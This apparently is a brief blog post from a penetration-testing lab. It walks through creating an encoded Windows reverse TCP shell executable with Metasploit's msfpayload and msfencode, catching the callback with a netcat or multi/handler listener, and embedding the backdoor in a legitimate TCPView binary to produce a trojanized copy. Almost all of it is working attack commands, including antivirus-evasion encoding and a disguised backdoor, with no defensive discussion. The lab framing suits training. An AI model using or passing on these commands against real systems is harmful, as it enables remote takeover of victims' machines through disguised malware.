Step 1: On TEST-BT4, create an Encoded EXE Payload
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see, a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
No comments:
Post a Comment